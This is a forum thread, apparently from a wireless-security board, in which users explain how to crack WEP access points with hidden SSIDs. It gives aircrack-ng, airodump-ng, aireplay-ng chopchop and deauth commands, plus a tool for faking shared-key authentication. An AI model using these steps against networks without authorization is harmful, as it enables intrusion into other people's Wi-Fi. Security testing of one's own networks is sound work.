Hello!

I have a success on crack ap with or without client connected :) (thanks toeverybody here!!) but I don't know how to crack an ap with hidden ssid.
I see kismet found my ap with hidden ssid..but I don't know how to use aircrack and airodump for crack when no ssid...somebody can help?? thx!!

Hello!

I have a success on crack ap with or without client connected :) (thanks to everybody here!!) but I don't know how to crack an ap with hidden ssid.
I see kismet found my ap with hidden ssid..but I don't know how to use aircrack and airodump for crack when no ssid...somebody can help?? thx!!

I think I understand your question..mabey not...but if I do understand then the answer is simple..use kismet to find the name of the hidden network..then type the name of the hidden network in the appropriate field in airodump as in....

airodump-ng -c 6 -e Xploitz (Xploitz is name of hidden network name) -w (file name here) --ivs --bssid (AP mac addy here) YOUR DEVICE HERE

and for aircrack-ng use aircrack-ng *.ivs -b (AP MAC HERE) hit enter

or aircrack-ng *.cap -b (bssid) hit enter

or if your using aircrack-ptw remeber not to use the --ivs in ariodump-ng and your aircrack-ptw will look like

aircrack-ptw *.cap or aircrack-ptw (name of saved file).cap:)

you can also use a deauth attack (if there are ever clients) to get the network name, it will show up in airodump when the client resends it.

let's be clear, is it <NO SSID> or <HIDDEN SSID> .... there is a difference.

it's writed NO SSID ...what is the difference?

and also a last question that i still not understand...how to do the fake auth when the network it's a SKA (shared Key Auth) and not Open Auth? thanks!!

use ska located in /pentest/wireless/
with this norm u can do fake auth with shared key............

like this

aireplay-ng -4 rausb0

after saving a packet remember the name of xor file

ska rausb0 "BSSID" APMAC FAKEMAC file.xor

wait after a while will say you are auth and will exit

hope helps

use ska located in /pentest/wireless/
with this norm u can do fake auth with shared key............

like this

aireplay-ng -4 rausb0

after saving a packet remember the name of xor file

ska rausb0 "BSSID" APMAC FAKEMAC file.xor

wait after a while will say you are auth and will exit

hope helps

Hello!!

So first, thank you so much! now I feel near to can make a fake auth in a ska... but I still have some problems...
When I use the command "aireplay-ng 4 ath1" he start to capture some packets and save in a .CAP and not in a .XOR file.
Than, after some minute he ask me if I wanna try to authenticate with this packet.If I say "Yes" he will try something and after fail...if I say "No" he just ask me again with another key or packet...
however I have tryed to use the cap file like a xor but when I use the command ska auth1 bssid mac fakemac file.cap he give me a error cuz no have the command "ska"

did u have some ideas? thx!

Only when chopchop attack succed it will save the xor file
you should get :
.....Saving keystream in replay_dec-xxxxx.xor ...
so keep trying to send various packets

Only when chopchop attack succed it will save the xor file
you should get :
.....Saving keystream in replay_dec-xxxxx.xor ...
so keep trying to send various packets

how can I do it? ...can you be more clear? thanks!

http://www.aircrack-ng.org/doku.php?id=korek_chopchop